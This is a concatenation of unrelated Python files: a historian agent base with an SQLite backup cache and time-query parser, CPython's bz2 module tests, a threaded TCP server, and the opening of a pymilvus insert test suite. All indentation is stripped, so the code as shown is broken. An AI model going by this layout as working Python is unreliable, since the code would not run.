"""Optional setup routine, run in the processing thread before
main processing loop starts. Gives the Historian a chance to setup
connections in the publishing thread.
"""
class BackupDatabase:
"""
Creates and manages a backup cache for the
:py:class:`BaseHistorianAgent` class.
Historian implementors do not need to use this class. It is for internal
use only.
"""
def __init__(self, owner, backup_storage_limit_gb):
# The topic cache is only meant as a local lookup and should not be
# accessed via the implemented historians.
self._backup_cache = {}
self._meta_data = defaultdict(dict)
self._owner = weakref.ref(owner)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._setupdb()
def backup_new_data(self, new_publish_list):
"""
:param new_publish_list: A list of records to cache to disk.
:type new_publish_list: list
"""
_log.debug("Backing up unpublished values.")
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
def page_count():
c.execute("PRAGMA page_count")
return c.fetchone()[0]
while page_count() >= self.max_pages:
self._owner().vip.pubsub.publish('pubsub', 'backupdb/nomore')
c.execute(
'''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ROWID ASC LIMIT 100)''')
for item in new_publish_list:
source = item['source']
topic = item['topic']
meta = item.get('meta', {})
values = item['readings']
topic_id = self._backup_cache.get(topic)
if topic_id is None:
c.execute('''INSERT INTO topics values (?,?)''',
(None, topic))
c.execute('''SELECT last_insert_rowid()''')
row = c.fetchone()
topic_id = row[0]
self._backup_cache[topic_id] = topic
self._backup_cache[topic] = topic_id
meta_dict = self._meta_data[(source, topic_id)]
for name, value in meta.iteritems():
current_meta_value = meta_dict.get(name)
if current_meta_value != value:
c.execute('''INSERT OR REPLACE INTO metadata
values(?, ?, ?, ?)''',
(source, topic_id, name, value))
meta_dict[name] = value
for timestamp, value in values:
if timestamp is None:
timestamp = get_aware_utc_now()
_log.debug("Inserting into outstanding table with timestamp "
"{}".format(timestamp))
c.execute(
'''INSERT OR REPLACE INTO outstanding
values(NULL, ?, ?, ?, ?)''',
(timestamp, source, topic_id, jsonapi.dumps(value)))
self._connection.commit()
def remove_successfully_published(self, successful_publishes,
submit_size):
"""
Removes the reported successful publishes from the backup database.
If None is found in `successful_publishes` we assume that everything
was published.
:param successful_publishes: List of records that were published.
:param submit_size: Number of things requested from previous call to :py:meth:`get_outstanding_to_publish`.
:type successful_publishes: list
:type submit_size: int
"""
_log.debug("Cleaning up successfully published values.")
c = self._connection.cursor()
if None in successful_publishes:
c.execute('''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ts LIMIT ?)''', (submit_size,))
else:
temp = list(successful_publishes)
temp.sort()
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in
successful_publishes))
self._connection.commit()
def get_outstanding_to_publish(self, size_limit):
"""
Retrieve up to `size_limit` records from the cache.
:param size_limit: Max number of records to retrieve.
:type size_limit: int
:returns: List of records for publication.
:rtype: list
"""
_log.debug("Getting oldest outstanding to publish.")
c = self._connection.cursor()
c.execute('select * from outstanding order by ts limit ?',
(size_limit,))
results = []
for row in c:
_id = row[0]
timestamp = row[1]
source = row[2]
topic_id = row[3]
value = jsonapi.loads(row[4])
meta = self._meta_data[(source, topic_id)].copy()
results.append({'_id': _id,
'timestamp': timestamp.replace(tzinfo=pytz.UTC),
'source': source,
'topic': self._backup_cache[topic_id],
'value': value,
'meta': meta})
c.close()
return results
def _setupdb(self):
""" Creates a backup database for the historian if doesn't exist."""
_log.debug("Setting up backup DB.")
self._connection = sqlite3.connect(
'backup.sqlite',
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
c.execute('''PRAGMA page_size''')
page_size = c.fetchone()[0]
max_storage_bytes = self._backup_storage_limit_gb * 1024 ** 3
self.max_pages = max_storage_bytes / page_size
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='outstanding';")
if c.fetchone() is None:
_log.debug("Configuring backup BD for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE outstanding
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
UNIQUE(ts, topic_id, source))''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='metadata';")
if c.fetchone() is None:
self._connection.execute('''CREATE TABLE metadata
(source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
name TEXT NOT NULL,
value TEXT NOT NULL,
UNIQUE(topic_id, source, name))''')
else:
c.execute("SELECT * FROM metadata")
for row in c:
self._meta_data[(row[0], row[1])][row[2]] = row[3]
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='topics';")
if c.fetchone() is None:
self._connection.execute('''create table topics
(topic_id INTEGER PRIMARY KEY,
topic_name TEXT NOT NULL,
UNIQUE(topic_name))''')
else:
c.execute("SELECT * FROM topics")
for row in c:
self._backup_cache[row[0]] = row[1]
self._backup_cache[row[1]] = row[0]
c.close()
self._connection.commit()
class BaseQueryHistorianAgent(Agent):
"""This is the base agent for historian Agents that support querying of
their data stores.
"""
@RPC.export
def query(self, topic=None, start=None, end=None, skip=0,
count=None, order="FIRST_TO_LAST"):
"""RPC call
Call this method to query an Historian for time series data.
:param topic: Topic to query for.
:param start: Start time of the query. Defaults to None which is the beginning of time.
:param end: End time of the query. Defaults to None which is the end of time.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or "LAST_TO_FIRST"
:type topic: str
:type start: str
:type end: str
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
Return values will have the following form:
.. code-block:: python
{
"values": [(<timestamp string1>: value1),
(<timestamp string2>: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
The string arguments can be either the output from
:py:func:`volttron.platform.agent.utils.format_timestamp` or the special string "now".
Times relative to "now" may be specified with a relative time string using
the Unix "at"-style specifications. For instance "now -1h" will specify one hour ago.
"now -1d -1h -20m" would specify 25 hours and 20 minutes ago.
"""
if topic is None:
raise TypeError('"Topic" required')
if start is not None:
try:
start = parse(start)
except TypeError:
start = time_parser.parse(start)
if end is not None:
try:
end = parse(end)
except TypeError:
end = time_parser.parse(end)
if start:
_log.debug("start={}".format(start))
results = self.query_historian(topic, start, end, skip, count, order)
metadata = results.get("metadata", None)
values = results.get("values", None)
if values is not None and metadata is None:
results['metadata'] = {}
return results
@RPC.export
def get_topic_list(self):
"""RPC call
:return: List of topics in the data store.
:rtype: list
"""
return self.query_topic_list()
@abstractmethod
def query_topic_list(self):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.get_topic_list`
to actually retrieve the topic list from the data store.
:return: List of topics in the data store.
:rtype: list
"""
@abstractmethod
def query_historian(self, topic, start=None, end=None, skip=0, count=None,
order=None):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.query`
to actually query the data store
and must return the results of a query in the form:
.. code-block:: python
{
"values": [(timestamp1: value1),
(timestamp2: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
Timestamps must be strings formatted by
:py:func:`volttron.platform.agent.utils.format_timestamp`.
"metadata" is not required. The caller will normalize this to {} for you if it is missing.
:param topic: Topic to query for.
:param start: Start of query timestamp as a datetime.
:param end: End of query timestamp as a datetime.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or "LAST_TO_FIRST"
:type topic: str
:type start: datetime
:type end: datetime
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
"""
class BaseHistorian(BaseHistorianAgent, BaseQueryHistorianAgent):
def __init__(self, **kwargs):
_log.debug('Constructor of BaseHistorian thread: {}'.format(
threading.currentThread().getName()
))
super(BaseHistorian, self).__init__(**kwargs)
# The following code is
# Copyright (c) 2011, 2012, Regents of the University of California
# and is under the same licence as the remainder of the code in this file.
# Modifications were made to remove unneeded pieces and to fit with the
# intended use.
import ply.lex as lex
import ply.yacc as yacc
from dateutil.tz import gettz, tzlocal
local = tzlocal()
def now(tzstr='UTC'):
"""Returns an aware datetime object with the current time in
tzstr timezone"""
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return datetime.now(tz)  # datetime here is the class imported at the top of this file
def strptime_tz(str, format='%x %X', tzstr='Local'):
"""Returns an aware datetime object. tzstr is a timezone string such as
'US/Pacific' or 'Local' by default which uses the local timezone.
"""
dt = datetime.strptime(str, format)
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return dt.replace(tzinfo=tz)
tokens = ('NOW', "QSTRING", 'LVALUE', 'NUMBER')
reserved = {
'now': 'NOW'}
literals = '()[]*^.,<>=+-/'
time_units = re.compile('^(d|days?|h|hours?|m|minutes?|s|seconds?)$')
def get_timeunit(t):
if not time_units.match(t):
raise ValueError("Invalid timeunit: %s" % t)
if t.startswith('d'):
return 'days'
elif t.startswith('h'):
return 'hours'
elif t.startswith('m'):
return 'minutes'
elif t.startswith('s'):
return 'seconds'
def t_QSTRING(t):
r"""("[^"\\]*?(\\.[^"\\]*?)*?")|(\'[^\'\\]*?(\\.[^\'\\]*?)*?\')"""
if t.value[0] == '"':
t.value = t.value[1:-1].replace('\\"', '"')
elif t.value[0] == "'":
t.value = t.value[1:-1].replace("\\'", "'")
return t
def t_LVALUE(t):
r"""[a-zA-Z\~\$\_][a-zA-Z0-9\/\%_\-]*"""
t.type = reserved.get(t.value, 'LVALUE')
return t
def t_NUMBER(t):
r"""([+-]?([0-9]*\.)?[0-9]+)"""
if '.' in t.value:
try:
t.value = float(t.value)
except ValueError:
print("Invalid floating point number", t.value)
t.value = 0
else:
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
is_number = lambda x: isinstance(x, int) or isinstance(x, float)
t_ignore = " \t"
def t_newline(t):
r"""[\n\r]+"""
t.lexer.lineno += t.value.count("\n")
def t_error(t):
raise ValueError("Syntax Error in Query")
# print("Illegal character '%s'" % t.value[0])
# t.lexer.skip(1)
smapql_lex = lex.lex()
TIMEZONE_PATTERNS = [
"%m/%d/%Y",
"%m/%d/%Y %H:%M",
"%Y-%m-%dT%H:%M:%S",
"%Y-%m-%dT%H:%M:%S.%f",
]
def parse_time(ts):
for pat in TIMEZONE_PATTERNS:
try:
return strptime_tz(ts, pat)
except ValueError:
continue
raise ValueError("Invalid time string:" + ts)
def p_query_pair(t):
"""query : '(' timeref ',' timeref ')' """
t[0] = (t[2], t[4])
def p_query_single(t):
"""query : timeref """
t[0] = t[1]
# an absolute time reference. can be a unix timestamp, a date string,
# or "now"
def p_timeref(t):
"""timeref : abstime
| abstime reltime"""
t[0] = t[1]
if len(t) == 2:
ref = t[1]
else:
ref = t[1] + t[2]
t[0] = ref
def p_abstime(t):
"""abstime : NUMBER
| QSTRING
| NOW"""
if t[1] == 'now':
t[0] = now()
elif type(t[1]) == type(''):
t[0] = parse_time(t[1])
else:
t[0] = datetime.utcfromtimestamp(t[1] / 1000)
def p_reltime(t):
"""reltime : NUMBER LVALUE
| NUMBER LVALUE reltime"""
timeunit = get_timeunit(t[2])
delta = timedelta(**{timeunit: t[1]})
if len(t) == 3:
t[0] = delta
else:
t[0] = t[3] + delta
# Error rule for syntax errors
def p_error(p):
raise ValueError("Syntax Error in Query")
# Build the parser
time_parser = yacc.yacc(write_tables=0)
|
test_bz2.py
|
#!/usr/bin/env python
from test import test_support
from test.test_support import TESTFN, import_module
import unittest
from cStringIO import StringIO
import os
import subprocess
import sys
try:
import threading
except ImportError:
threading = None
bz2 = import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx", "riscos")
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT = 'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n'
DATA = 'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
DATA_CRLF = 'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 \x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80'
if has_cmdline_bunzip2:
def decompress(self, data):
pop = subprocess.Popen("bunzip2", shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pop.stdin.write(data)
pop.stdin.close()
ret = pop.stdout.read()
pop.stdout.close()
if pop.wait() != 0:
ret = bz2.decompress(data)
return ret
else:
# bunzip2 isn't available to run on Windows.
def decompress(self, data):
return bz2.decompress(data)
class BZ2FileTest(BaseTest):
"Test BZ2File type miscellaneous methods."
def setUp(self):
self.filename = TESTFN
def tearDown(self):
if os.path.isfile(self.filename):
os.unlink(self.filename)
def createTempFile(self, crlf=0):
f = open(self.filename, "wb")
if crlf:
data = self.DATA_CRLF
else:
data = self.DATA
f.write(data)
f.close()
def testRead(self):
# "Test BZ2File.read()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(), self.TEXT)
bz2f.close()
def testReadChunk10(self):
# "Test BZ2File.read() in chunks of 10 bytes"
self.createTempFile()
bz2f = BZ2File(self.filename)
text = ''
while 1:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
bz2f.close()
def testRead100(self):
# "Test BZ2File.read(100)"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertEqual(bz2f.read(100), self.TEXT[:100])
bz2f.close()
def testReadLine(self):
# "Test BZ2File.readline()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.readline, None)
sio = StringIO(self.TEXT)
for line in sio.readlines():
self.assertEqual(bz2f.readline(), line)
bz2f.close()
def testReadLines(self):
# "Test BZ2File.readlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.readlines, None)
sio = StringIO(self.TEXT)
self.assertEqual(bz2f.readlines(), sio.readlines())
bz2f.close()
def testIterator(self):
# "Test iter(BZ2File)"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(iter(bz2f)), sio.readlines())
bz2f.close()
def testClosedIteratorDeadlock(self):
# "Test that iteration on a closed bz2file releases the lock."
# http://bugs.python.org/issue3309
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, bz2f.next)
# This call will deadlock if the above .next call failed to
# release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testXReadLines(self):
# "Test BZ2File.xreadlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(bz2f.xreadlines()), sio.readlines())
bz2f.close()
def testUniversalNewlinesLF(self):
# "Test BZ2File.read() with universal newlines (\\n)"
self.createTempFile()
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\n")
bz2f.close()
def testUniversalNewlinesCRLF(self):
# "Test BZ2File.read() with universal newlines (\\r\\n)"
self.createTempFile(crlf=1)
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\r\n")
bz2f.close()
def testWrite(self):
# "Test BZ2File.write()"
bz2f = BZ2File(self.filename, "w")
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
bz2f.close()
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteChunks10(self):
# "Test BZ2File.write() with chunks of 10 bytes"
bz2f = BZ2File(self.filename, "w")
n = 0
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
bz2f.close()
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteLines(self):
# "Test BZ2File.writelines()"
bz2f = BZ2File(self.filename, "w")
self.assertRaises(TypeError, bz2f.writelines)
sio = StringIO(self.TEXT)
bz2f.writelines(sio.readlines())
bz2f.close()
# patch #1535500
self.assertRaises(ValueError, bz2f.writelines, ["a"])
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteMethodsOnReadOnlyFile(self):
bz2f = BZ2File(self.filename, "w")
bz2f.write("abc")
bz2f.close()
bz2f = BZ2File(self.filename, "r")
self.assertRaises(IOError, bz2f.write, "a")
self.assertRaises(IOError, bz2f.writelines, ["a"])
def testSeekForward(self):
# "Test BZ2File.seek(150, 0)"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
bz2f.close()
def testSeekBackwards(self):
# "Test BZ2File.seek(-150, 1)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
bz2f.close()
def testSeekBackwardsFromEnd(self):
# "Test BZ2File.seek(-150, 2)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
bz2f.close()
def testSeekPostEnd(self):
# "Test BZ2File.seek(150000)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
bz2f.close()
def testSeekPostEndTwice(self):
# "Test BZ2File.seek(150000) twice"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
bz2f.close()
def testSeekPreStart(self):
# "Test BZ2File.seek(-150, 0)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
bz2f.close()
def testOpenDel(self):
# "Test opening and deleting a file many times"
self.createTempFile()
for i in xrange(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
# "Test opening a nonexistent file"
self.assertRaises(IOError, BZ2File, "/non/existent")
def testModeU(self):
# Bug #1194181: bz2.BZ2File opened for write with mode "U"
self.createTempFile()
bz2f = BZ2File(self.filename, "U")
bz2f.close()
f = file(self.filename)
f.seek(0, 2)
self.assertEqual(f.tell(), len(self.DATA))
f.close()
def testBug1191043(self):
# readlines() for files containing no newline
data = 'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
f = open(self.filename, "wb")
f.write(data)
f.close()
bz2f = BZ2File(self.filename)
lines = bz2f.readlines()
bz2f.close()
self.assertEqual(lines, ['Test'])
bz2f = BZ2File(self.filename)
xlines = list(bz2f.xreadlines())
bz2f.close()
self.assertEqual(xlines, ['Test'])
def testContextProtocol(self):
# BZ2File supports the context management protocol
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1 // 0
except ZeroDivisionError:
pass
else:
self.fail("1 // 0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Using a BZ2File from several threads doesn't deadlock (issue #7205).
data = "1" * 2**20
nthreads = 10
f = bz2.BZ2File(self.filename, 'wb')
try:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
finally:
f.close()
class BZ2CompressorTest(BaseTest):
def testCompress(self):
# "Test BZ2Compressor.compress()/flush()"
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressChunks10(self):
# "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes"
bz2c = BZ2Compressor()
n = 0
data = ''
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
# "Test BZ2Decompressor.decompress()"
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
# "Test BZ2Decompressor.decompress() with chunks of 10 bytes"
bz2d = BZ2Decompressor()
text = ''
n = 0
while 1:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
# "Test BZ2Decompressor.decompress() with unused data"
bz2d = BZ2Decompressor()
unused_data = "this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
# "Calling BZ2Decompressor.decompress() after EOS must raise EOFError"
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, "anything")
class FuncTest(BaseTest):
"Test module functions"
def testCompress(self):
# "Test compress() function"
data = bz2.compress(self.TEXT)
self.assertEqual(self.decompress(data), self.TEXT)
def testDecompress(self):
# "Test decompress() function"
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
# "Test decompress() function with empty string"
text = bz2.decompress("")
self.assertEqual(text, "")
def testDecompressIncomplete(self):
# "Test decompress() function with incomplete data"
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def test_main():
test_support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
FuncTest
)
test_support.reap_children()
if __name__ == '__main__':
test_main()
# vim:ts=4:sw=4
|
server.py
|
import socket
import threading
import socketserver
import logging as log
from tcp_request_handler import TCPRequestHandler as RequestHandler
class ThreadTcpServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == '__main__':
log.basicConfig(level=log.DEBUG)
host, port = "localhost", 8888
server = ThreadTcpServer((host, port), RequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
log.debug('Server started at {}:{}!'.format(host, port))
input()
server.shutdown()
|
test_insert.py
|
from ssl import ALERT_DESCRIPTION_UNKNOWN_PSK_IDENTITY
import threading
import numpy as np
import pandas as pd
import random
import pytest
from pymilvus import Index, DataType
from pymilvus.exceptions import MilvusException
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
default_search_exp = "int64 >= 0"
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
pytest.skip("list and None type is valid data type")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create collection
2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_non_data_type(self, get_non_data_type):
"""
